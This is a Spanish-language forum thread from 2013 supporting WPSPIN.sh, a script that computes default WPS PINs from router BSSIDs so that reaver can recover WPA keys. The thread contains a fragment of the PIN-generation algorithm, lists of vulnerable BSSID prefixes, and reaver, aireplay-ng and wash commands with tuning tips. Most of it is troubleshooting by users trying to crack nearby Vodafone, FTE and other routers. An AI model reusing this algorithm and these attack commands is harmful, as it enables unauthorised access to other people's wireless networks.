Lo puse en un valor de dos que suele ser suficiente, si no es a la de uno es a la de tres con este delay...
ahora cuando un routeur te resista es bueno hacer al attaque a mano y aumentar todos los delays

Pero concretamente aquí ahora el problema esta en que parece que simplemente no esta activado el WPS...
O que el routeur esta en el coma...  :P

[time]Enero 09, 2013, 03:39:30 am[/time]
fijale el canal -c y el numero del canal para ver si así no associa por lo menos...

Citar
Buenas, voy a ver que puedo hacer tengo el wpspin instalado pero no se si he de actualizar algo por que es el que viene por defecto en bugtraq2 beta (no es el foro linux y por lo que pone en las normas no hay problema en mencionarlo, no?)
:) > http://lampiweb.com/foro/index.php/topic,9882.0.html
No sabía que WPSPIN estaba integrado en bugtraq, me agrada y me parece muy bien, es para compartir  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: rub3n en Enero 09, 2013, 19:09:22 pm
Funciona de putísima madre. Mis dies.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 09, 2013, 19:23:54 pm
Gracias  ;D
Y bienvenido al foro.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: totstar en Enero 09, 2013, 22:18:17 pm
Ni asocias  :-\ .... 80% en WCID deberían ser suficiente
Fijate bien que no haya trafico y clientes asociados.
Fijate que el wps no haya sido desactivado,
Porque que reaver ni se parre un segundo en el canal del routeur, esto no debería pasar aunque este la señal muy baja (y no es el caso porque WCID es más bien del palo de poner te 50% para una señal ya muy muy decente)
No es nada normal que con tal señal ni "vea" tu objetivo
Código: [Seleccionar]
sudo wash -i mon0 -C

El wps me da activo con varios programas, no hay trafico, una vez hice un ataque a pelo y llego al 12% en una noche y se desconecto, era la primera vez que usaba reaver pero no se que pasa ahora

Citar
o gladiator no me reuerdo quien de los dos, insisto hace poco en que para unos bssid FTE-XXXX era necesario usar wps reaver 1.3...

Si, algo lei de problemas con el cheksun o no se que y he vivido lo de que se quede pillado metiendo el mismo pin en el 99,9% pero otras redes FTE-XXXX me las ha sacado al instante un programa de pins wps por defecto diferente al tuyo, el tuyo tambien los saca pero aun no lo conocia y con esta que te comento no hay manera... lo raro es que ya no asocie y la primera vez si

Citar
el comando reaver de wps pin lleva un poco mas de delay que  por defecto porque note que unos routeurs no te deban el M6 y M7 si no esperabas más de los 0.25 segundos que hay por defecto entre peticiones entre primera y segunda mitad de PIN.
Lo puse en un valor de dos que suele ser suficiente, si no es a la de uno es a la de tres con este delay...
ahora cuando un routeur te resista es bueno hacer al attaque a mano y aumentar todos los delays

Probare a volver a atacar a mano que es como lo hice la primera (aunque nunca mas pude como ya te comento arriba)

Citar
Pero concretamente aquí ahora el problema esta en que parece que simplemente no esta activado el WPS...
O que el routeur esta en el coma...  :P

[time]Enero 09, 2013, 03:39:30 am[/time]
fijale el canal -c y el numero del canal para ver si así no associa por lo menos...

He probado el minidwep del xiaopang y dice que tiene wps, el inflator tambien, y asi tropecientas cosas, probare como dices a atacar con reaver desde la consola y si no asocia rendirme

Citar
:) > http://lampiweb.com/foro/index.php/topic,9882.0.html
No sabía que WPSPIN estaba integrado en bugtraq, me agrada y me parece muy bien, es para compartir  ;)

La verdad que me imagino que estaras orgulloso, pero podrian habertelo avisado, a finales de febrero saldra la version final a ver si integran tu ultima version! yo me la pude instalar sin problemas (la primera cosa que instalo yo en algo que no sea windows) esta mas bonico que la primera ahora a ver si le doy uso!

Muchas gracias por tu tiempo kcdtv! vigilare lo que trames :elrisas:
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 09, 2013, 22:28:32 pm
Citar
pero otras redes FTE-XXXX me las ha sacado al instante un programa de pins wps por defecto diferente al tuyo
Buenas.. es de la casa o de fuera.  Mera curiosidad   :D
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 09, 2013, 23:20:44 pm
Puedes probar añadir "-A" a tu liña de ataque reaver.

Código: [Seleccionar]
-A, --no-associate              Do not associate with the AP (association must be done by another application)

Y asociar con aireplay-ng

Código: [Seleccionar]
(sudo) aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX mon0
o

Código: [Seleccionar]
(sudo) aireplay-ng -1 6000 -o 1 -q 10 -a XX:XX:XX:XX:XX:XX mon0
Citar
La verdad que me imagino que estarás orgulloso, pero podrían habértelo avisado, a finales de febrero saldrá la versión final a ver si integran tu ultima version!

Ya pero imagínate el curo que es contactar no se cuantos autores de no se cuantos países...  Mejor que se centren en llevar a cabo este labor enorme, hacer una live de 3 giga...

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: bukanero en Enero 11, 2013, 11:06:27 am
Saludos a la comunidad...un pequeño apunte y muy raro....wpspin no rula en blackbuntu 3....no lo entiendo si está basado en ubuntu 10.10...se supone que debería funcionar....en cambio si lo hace perfectamente en xubuntu 10...
Básicamente,cuando ejecuto el script,me abre el source enterito..o sea,todo el código del programa...dejo un fragmento de la consola(tremendo chorizo xd)


echo ""
echo "                             PIN WPS por defecto"
echo "\033[32m-------------------------------------------------------------------------------\033[0m"
echo ""
echo "FTE-XXXX                              \033[32m > \033[0m              Huawei  HG 532c-EchoLife"
echo "(*)vodafoneXXXX                       \033[32m > \033[0m                        Huawei  HG556a"
echo "(*)belkin.XXX                         \033[32m > \033[0m                      F9K1104, F5D8231"
echo "(*)Belkin_N+_XXXXXX                   \033[32m > \033[0m                               F5D8235"
echo "(*)WLAN-XXXX                          \033[32m > \033[0m                  Teldat iRouter1104-W"
echo "(*)ZyXEL                              \033[32m > \033[0m                        zyxel NBG-419n"
echo ""
echo "(*)Algoritmo similar al descubierto por Zaochesung(routeur Tenda W309R)"
echo "\033[32m-------------------------------------------------------------------------------\033[0m"
echo "\033[31m¡NUEVO!\033[0m : Se integrarón varios PINes genricos, más detalles en el readme.txt"
echo ""
read -p "   >    Pegar el Essid y darle a <Enter>: " ESSID                 
echo ""
read -p "   >    Pegar el Bssid y darle a <Enter>: " BSSID           
echo ""


CHECKESSID=$(echo $ESSID | cut -d '-' -f1)
DEBUTBSSID=$(echo $BSSID | cut -d ":" -f1,2,3)
CHECKBSSID=$(echo $DEBUTBSSID | tr -d ':')
FINBSSID=$(echo $BSSID | cut -d ':' -f4-)                               
MAC=$(echo $FINBSSID | tr -d ':')                         
CONVERTEDMAC=$(printf '%d\n' 0x$MAC)                     

STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
PIN=`expr 10 '*' $STRING`                          # de www.crack-wifi.com
ACCUM=0                                                  #¡Gracias amigo Antares! :)
                                                         
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`

etc,etc,etc...

Aún así,INMENSO trabajo...excelente...
Inflator tira de reaver 1.4....cuando le quiero meter un pin concreto,me impide continuar con el mismo y me lleva al que "le parece"...
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 11, 2013, 12:35:49 pm
Ejecutaste el script llamando a bash
Código: [Seleccionar]
bash WPSPIN.sho con sh
Código: [Seleccionar]
sh WPSPIN.sh
llamando a bash debería funcionar.
Es mejor que uses la versión genérica (la para xubuntu y ubuntu es solo para xubuntu y ubuntu, tendrá este bug del código color en backtrack o blkackbuntu, a pesar de basarse en ubuntu)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: raymax en Enero 22, 2013, 12:09:13 pm
interesante WPSPIN linux, lo mejor que he visto asta ahora... y impacinte por conocer. Cuando saldra wpspin linux?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 22, 2013, 14:03:37 pm
He movido tu repuesta en el hilo adecuado  ;)
gracias por lo comentado  :)
Para responder a tu pregunta: esta en el horno  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: abuabdellah en Enero 22, 2013, 20:22:49 pm
avereguando las belkin acabo de entender qe se puede sacar el pin atraves de los degetos del essid converindo el exadecimal a dicimales pero me interesa saber mas detalles sobre las otras agradeseria cualqier ayuda
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 23, 2013, 03:18:35 am
links de descarga actualizados en primer post

23 enero 2012
 Tercera entrega, se da soporte a 
  - 7 bSSID nuevos vodafoneXXXX (HG566a) > 6A:3D:FF / 6A:A8:E4 / 6A:C0:6F / 6A:D1:67 / 72:A8:E4 / 72:3D:FF / 72:53:D4
  - 2 bSSID nuevos WLAN_XXXX (PDG-A4001N de adbroadband) > 74:88:8B / A4:52:6F
  - ¡2 nuevos dispositivos afectados!:
      1) SWL (Samsung Wireless Link), eSSID por defecto SEC_ LinkShare_XXXXXX.  2 bssid soportados conocidos > 80:1F:02 / E4:7C:F9
      2) Conceptronic  c300brs4a  (eSSID por defecto C300BRS4A ) bssid conocido > 00:22:F7   
  Añadidas reglas de comprobación de r00tnull (validez bSSID, mejora filtro essid FTE)
  Más información proporcionada en salida
  Añadidos filtros para bssid con varios essid por defecto  posibles
  Una sola versión par esta entrega (valida para todas las distribuciones) en lugar de dos                                           
  Re-escritura del código para optimizarlo; ver las anotaciones del código para detalles.

algunas imágenes...

(http://i.imm.io/TMi6.png)

(http://i.imm.io/TMnn.png)

buenas noches a tod@s y a la próxima...  ;)
los links están actualizados en el primer post pero como es muy tarde los dejo aqui también para que no tengan que buscar
gracias a papones (www.auditoriaswireless.net) por el alojamiento

vinculo uno para WPSPIN.sh

vinculo dos para WPSPIN.sh
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ñanduti en Enero 23, 2013, 06:44:34 am
gracias maestro ;)  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: carrasco30 en Enero 23, 2013, 09:10:39 am
gracias tio
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: perdi en Enero 23, 2013, 09:38:59 am
HOLA

tengo problemas con la descarga del nuevo script, tanto las de unos post prec edentes, como las actualizadas en la primera pagina.

poddeis comprobarlo por facor.

saludos.

PD: gran gran gradioso trabajo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 23, 2013, 10:08:04 am


(http://embed.mixturecloud.com/media/full/S8TUhBVi.jpg)


Tanto los dos enlaces del primer post como los dos del post de actualización me van bien..  ¿exactamente que te sucede?

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: perdi en Enero 23, 2013, 10:11:46 am
pues que descargo el archivo, y quando quiero descomprimer veo que dentro hay 3 archivo (a veces 4, porque lo he probado varias veces), pero si quiero descomprimirlos en una ubicacion me da error, y si quiero abrirlos directamente para leer el readme por ejemplo no se abren.

uso 7zip

hace unos dias me descargué el anterior script y todo bien, con el mismo ordenador.

no sé, probare desde otro a ver que es.

gracias por el interes
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 23, 2013, 10:22:28 am

(http://embed.mixturecloud.com/media/full/AjE6DUfd.jpg)

A mi me descomprime bien..  trata de actualizar tu 7.zip o usa un portable. Ya te dirán algo mas.. te respondí pensando que era problema de descarga, para el resto no te puedo ayudar ya que no uso linux.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Enero 23, 2013, 10:56:35 am
Enhorabuena kcdtv

Funciona perfectamente en Ubuntu 12.04.

En cuanto al .zip,utilizo ark y todo ok.

Un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: perdi en Enero 23, 2013, 11:03:10 am
hola, soy yo otra vez
desde otro ordenador todo ok
seria problema dek 7zip

gracias

pd:borrad los post relativos al problema, ya que esta solucionado y los posts no aportan nada

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: bukanero en Enero 23, 2013, 12:45:34 pm
Gracias kcdtv,impecable...funciona perfectamente en xubuntu 10.10  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pericleta en Enero 23, 2013, 15:13:54 pm
chapeau, monsieur!!!
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: firpo en Enero 23, 2013, 22:45:29 pm
Fabricante >   HUAWEI           
essid         >   FTE-XXXX         
modelo     >   HG532c Echo Life 

¿Alguien ha probado si para este modelo de router, con su ESSID y BSSID correspondientes, le devuelve el pin correcto?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: edik en Enero 23, 2013, 23:51:51 pm
si yo probe con bssid CC:96:A0:XX:XX:XX y me da el clave corecto
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 24, 2013, 08:46:03 am
 :)

PD: para descomprimir el fichero se puede hacer así >
Código: [Seleccionar]
unzip WPSPIN.sh
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: firpo en Enero 24, 2013, 13:47:00 pm
:)

PD: para descomprimir el fichero se puede hacer así >
Código: [Seleccionar]
unzip WPSPIN.sh

Y una vez descomprimido, cambiarle el nombre por el mismo, pero sin el espacio final que hay -aunque no sea advertido- donde marco *

Es decir, cambiar el nombre WPSPIN.sh* con espacio final a WPSPIN.sh sin espacio final.

[time]Enero 24, 2013, 13:55:47 pm[/time]
28:5F:DB:XX:XX:XX
B4:74:9F:XX:XX:XX

Por cierto, para estas mac's, la versión anterior me da el pin correcto. La última versión, me da el pin incorrecto.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 24, 2013, 14:11:21 pm
Citar
la versión anterior me da el pin correcto. La última versión, me da el pin incorrecto.
¿Has comprobado las aplis de Windows o solo es la de linux? Si no las has comprobado ¿te importaría hacerlo? gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: firpo en Enero 24, 2013, 16:20:16 pm
¿Has comprobado las aplis de Windows o solo es la de linux? Si no las has comprobado ¿te importaría hacerlo? gracias.

¡Faltaría más!
Probados con  tu WPSpin 'GUI v3   RTM en Wine: O.K.

De paso, hemos deleitado el oído.  ;)

Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 24, 2013, 17:59:11 pm

Citar
¡Faltaría más!
Probados con  tu WPSpin 'GUI v3   RTM en Wine: O.K.
Upss! si no es por tu cita no me doy cuenta de que me había "colao" en el post dejando el letrero de RTM   ::)     

[img width=233 height=128]https://i.minus.com/jy4kGXtoGLi2n.jpg[/img]


Bien, entonces todo apunta a un bug en el script.. ya nos dirá algo kcdtv en cuanto pueda revisarlo. Mientras tanto si no te importa y vía MP a mi o al mismo nos adjuntas los datos con los que has probado el script y la GUI para los BSSID 28:5F:DB y B4:74:9F ya que tal vez pueda facilitar la tarea de dar con el bug.

Un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: firpo en Enero 24, 2013, 23:22:57 pm
Mientras tanto si no te importa y vía MP a mi o al mismo nos adjuntas los datos con los que has probado el script y la GUI para los BSSID 28:5F:DB y B4:74:9F ya que tal vez pueda facilitar la tarea de dar con el bug.

O.K. Ya te los he enviado.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 25, 2013, 06:21:48 am
Antes de todo gracias por probar el tool y reportar fallos

¿Que distro usas?
Te pregunto porque en las distro que gasto no hace falta renombrar el archivo.
Basta con descomprimir (unzip nombre_archivo_a_descomprimir) y ejecutar con
Código: [Seleccionar]
bash WPSPIN.shsin cambiar nada  ;)

Por lo demás te responderé en cuanto maripuri me mande los datos  ;)
es muy, muy extraños lo que comentas porque no he tocado los algoritmos, a la izquierda la versión anterior, a la derecha la nueva, el resultado es igual en los bssid que comentas en modo essid desconcodio...

(http://i.imm.io/U0Fg.png)

o con essid conocido

(http://i.imm.io/U0FV.png)






Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 25, 2013, 10:12:42 am
firpo, recibidos los datos gracias.

kcdtv los subo al hilo del grupo en un min..
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: firpo en Enero 25, 2013, 11:47:59 am
Basta con descomprimir (unzip nombre_archivo_a_descomprimir) y ejecutar con
Código: [Seleccionar]
bash WPSPIN.shsin cambiar nada  ;)
unzip WPSPIN.sh
Archive:  WPSPIN.sh.zip
  creating: WPSPIN.sh /
  inflating: WPSPIN.sh /BSSID.txt   
  inflating: WPSPIN.sh /LICENSE.txt
  etc...
 
Quizá el problema resida en que yo no sé cambiarme a un directorio cuyo nombre contenga un espacio final.
 
No había probado en modo ESSID desconocido. Haciéndolo así, sí que me muestra el mismo resultado que la anterior versión, incluido el pin correcto.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 25, 2013, 19:42:05 pm
He probado con los datos que has mandado a maripuri  y no se  cómo has hecho para llegar a resultados differentes  ???...  será un lio entre subidas que es possible que me haya confudido con una versión con bug
copiando y pegando los datos de las dos FTE-XXXX ;he obtenido los mismos resultado poniendo essid conocido y bssid conocidos.


Por lo de descomprimir, fijate en las carpetas que se crean en el directorio dónde estas situado
creo un directorio llamado "descomprimir wpspin"
par situarme lo hago con "cd" o lo podría hacer "click derecha > abrir Termial aquí" en e la carpeta que me apetece
Y descomprimo con unzip

(http://i.imm.io/U4rm.png)

lo que te parece ser un bug es muy normal  ;)

Citar
unzip WPSPIN.sh
Archive:  WPSPIN.sh.zip
  creating: WPSPIN.sh /
  inflating: WPSPIN.sh /BSSID.txt   
  inflating: WPSPIN.sh /LICENSE.txt
  etc...

archive > te dice cual es la archivo fuente
creating: WPSPIN.sh / Se esta creando el directorio descomprimido
inflaimg > "inchar" a entender cómo descomprimir, te da el nombre del archivo: BSSID.txt, LICENSE.txt etc.

fijate que en mi carpeta ·descomprimir wpspin" veo mi carpeta descomprimida creada y tengo el mismo mensaje que ti

(http://i.imm.io/U4vh.png)


lo de un problema con espacios en final de linea de ordenes, puedes escribir una orden bash, poner 500 espacios, le das a enter y se te ejecuta el orden si fallos, linux no toma en cuenta los espacios en final de linea de orden.

Cambiare el nombre del archivo fuente por WPSPIN.zip para que no allá confusiones o malentendidos dado que de momento tenemos una sola versión  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 25, 2013, 19:52:39 pm
explicaciones sobre el espacio, si usaís el link 2 (mirror Ubuntu One) tiene un espacio en el nombre

(http://i.imm.io/U4zG.png)

Dejo un solo link ya que el script es pequeño y que el link directo va muy bien

Arreglados los eventuales bugs con FTE, se verifica  la validez de la diferencia bssid - essid y se verifica que el bssid este en la lista de bssid soportados (caso FTE-XXXX de SAGEM, no atacable por WPS)
se da soporte al full disclosure nº9

descarga actualizada en primer post del hilo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: dragonfly en Febrero 02, 2013, 20:32:26 pm
Funciona de lujo en Linuxmint  8)
Gracias por tu tiempo en realizar el programa, y compartirlo.

Me da como posible un pin para una vodafoneXXXX con mac 62:C7:14, que es el correcto. Si quieres puedes añadirlo a soportados.

Un saludo

PD kcdtv, te mando los datos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: bukanero en Febrero 02, 2013, 22:04:21 pm
También funciona perfectamente en xubuntu 10.10...
Gracias por el trabajo  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 03, 2013, 10:07:21 am
Gracias por comentar  :)
Es de mucha ayuda saber en que versiones ha sido probado sin problemas (o con problemas  :P )
Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: firpo en Febrero 04, 2013, 23:28:04 pm
Repetidas las pruebas con las mismas mac's. Ahora O.K.

Gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 05, 2013, 08:58:26 am
Gracias a ti por comentar.  ;)
Y miles de disculpas por antes porque el falló era bien un falló... y un falló enteramente mio cuando hice el mirror en ubuntuone:
  - Puse una versión con un bug porque (no se porque) borre una linea con una variable imprescindible para el calculo del PIN con FTE modo essid conocido.
  - Además se puso un espacio entre .sh y .zip porque unbuntu one como otros servidores no excepta por razones de seguridad las doble extensiones concadenadas,
¡Vaya mirror!   ::)  :P   ;D
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pandurin en Febrero 16, 2013, 15:51:24 pm
ola a todos,aqui os dijo mi problema,es sobre la FTE-XXXX 80:B6:86....... e echo lo que dice lo del primera pagina y no me sale y tambien abriendo targeta modo monitor,abrimos wireshark etc.... asta aki todo ok p+ero despues cuando abro consola y escribo el siguiente comando # reaver -i mon0 -b 80:B6:86:XX:XX:XX -vv me sale el siguiente error,intentare poner unas capturas para que lo mireis ok??
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 16, 2013, 17:18:09 pm
No es que no quiero responderte pero el script solo llama a reaver.
Con un delay ligeramente aumentado entre M5 y M7 ya que a veces los 0.2 segundos que vienen por defecto son demasiado pocos, más cuando estemos en condiciones correctas pero no realmente buenas... Cuando el RXQ fluctua un poco o que el PWR es algo débil.
Cuando pones capturas de pantalla edita los datos personales, es decir enmascaras el final de la mac así que el final del essid.
Te lo digo porque en los dos mensajes anteriores que descansan en la papelera no lo habías hecho  ;)
El script solo genra los PINes o te da los PINes genéricos, si tienes un problema ejecutando reaver en consola es que el problema se localiza a este nivel, reaver.
Ya veremos con las capturas pero es probable que tu post no este bien ubicado  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pandurin en Febrero 16, 2013, 22:03:29 pm
gracias por responder kcdtv,p+ero asin el error que tngo yo que es que este lejos??tengo el PWR a -55,que es eso delay que aumente ligeramente M5 y M7.....a ver si me puede aydar que te lo agradeceria muchisimo de verdad,gracias un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 16, 2013, 22:13:12 pm
-55 es muy bueno normalmente. ¿Que chipset usas?
Código: [Seleccionar]
airmon-ngAsegúrate de bien estar desconectado de Internet, de que no hayan clientes conectados al routeur ( entorpece el ataque o lo hace imposible ) y de que el WPS no este desactivado
Código: [Seleccionar]
wash -i mon0 -C -c <numero canal de su routeur>
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pandurin en Febrero 16, 2013, 23:00:10 pm
gracias de nuevo, el chipset es atheros AR9285.
luego quieres que ponga este codigo ( wash -i mon0 -C -c <numero canal de su routeur> )en la consola de linux no?? y que pruebe a ver si sale todo ok no?? ahora probare y te digo algo gracias,esta bien este chipset?? muhas gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 16, 2013, 23:08:35 pm
Código: [Seleccionar]
wash -i mon0 -C -c 6si 6 es el canal dónde esta el routeur
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pandurin en Febrero 16, 2013, 23:26:27 pm
no entiendo lo que me quieres decir,y tengo que poner -C -c dos letras c????? el router esta en el canal 1
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 16, 2013, 23:35:11 pm
Código: [Seleccionar]
wash -i mon0 -C -c 1
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pandurin en Febrero 16, 2013, 23:58:05 pm
ok gracias,provare,y con este comando que saldra la key?? gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 17, 2013, 00:32:13 am
Si preguntas esto es que necesitas leer en los hilos sobre reaver  y dónde quieras, antes de usar un generador para un programa, aprenda las bases sobre el programa.
Prueba los comandos antes de preguntar lo que van a hacer, ya verás tu mismo.   ;)
En todos casos no desviaremos mas el hilo porque estas preguntas están ya hechas, respondidas y no tienen su sitio en el hilo sobre WPSPIN.sh

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pandurin en Febrero 17, 2013, 01:46:04 am
pue el wps esta activado,y no hay clientes conectados pero como dije me sale el error que puse las capturas,y yo ponia este comando: reaver -i mon0 -b la macc -vv
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 17, 2013, 02:34:52 am
no veo capturas, si subes imágenes, edita los datos personales como esta explicado en las Normas

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: aniir en Febrero 25, 2013, 19:10:06 pm
Hola

Como me puedo descargar el WPSPIN linux script test versión by kcdtv

Gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 25, 2013, 19:19:22 pm
Puedes descargar lo desde el primer post de este tema que es para la aplicación linux.
saludos y bienvenido
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Febrero 25, 2013, 19:29:57 pm

aniir, no me enviés MP's para estas cosas (lee mi firma).  Ya te ha respondido kcdtv.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: gitanoprin en Febrero 25, 2013, 20:26:36 pm
¿¿ algo nuevo sobre la vodafone 64:16:F0 ?  :-\


tengo una red nueva de jazztel_xx wpa C8:D1:5E  :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: manuvalencia24 en Febrero 26, 2013, 21:58:09 pm
hola cual sistema operativo lo puedo  usar?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Febrero 27, 2013, 00:06:36 am
Esta escrito en bash que es el interprete de ordenes por defecto de un sistema linux así que lo puedes usar desde cualquier linux abriendo un terminal y ejecutrandole con
Código: [Seleccionar]
bash WPSPIN.sh.
Para ataque reaver necesitas tener aircrack-ng, revaer wps y sus dependencias correctamente instalados.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: aniir en Febrero 28, 2013, 22:03:35 pm
Hola ..

los pin's que nos genera el WPSPIN son para utilizar en el reaver ??

Gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Febrero 28, 2013, 22:39:05 pm

Obviamente no has leído mucho del tema reaver..  por supuesto que se pueden usar, lee sobre el manejo y verás que puedes indicar a reaver que pruebe un PIN en concreto (el que te proporciona WPSPIN en este caso).

nota. El foro está para participar, si usamos el MP para despejar todas las dudas entonces:

a) un foro som@s tod@.. si no participamos en el para aprender, enseñar, consultar y aportar ¿que sentido tiene?
b) según esa regla de tres cerramos el foro y a "otra cosa mariposa"
b) ya que estamos pasamos del MP y concertamos citas a domicilio...    ::)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Marzo 01, 2013, 10:36:32 am
Después de generar un PIN tienes un menú que te permite atacar con reaver directamente con este PIN o usar WPSPIN con otro objetivo.

(http://ompldr.org/vaG1nZQ)

O si prefieres copias el pin y redactas tu propio comando reaver añadiendo
Código: [Seleccionar]
-p 8numerosPIN o lo pegas en Inflator... es como quieres.  ;)

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: gitanoprin en Marzo 10, 2013, 21:08:34 pm
detecto una red vodafone con mac 62:3D:FF sabeis algo sobre esa mac ?¿
y una preguntilla xabales ya se k en este hilo no es esta red pero neseciton una preguntilla sobre la red WLAN 00:19:15 si ya esta soportada como k no me da la clave y me pone k no esta soportada alguna informacion x fa  :'(
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Marzo 10, 2013, 21:28:47 pm
(http://i.imm.io/YTL1.png)

Lo que te dice: el WPS por defecto no esta activado, no podrás hacer nada.
Para presiciones te invito a leer el primer post de nuestro hiilo  Patrones de PINs para WPA

(http://i.imm.io/YTM8.png)
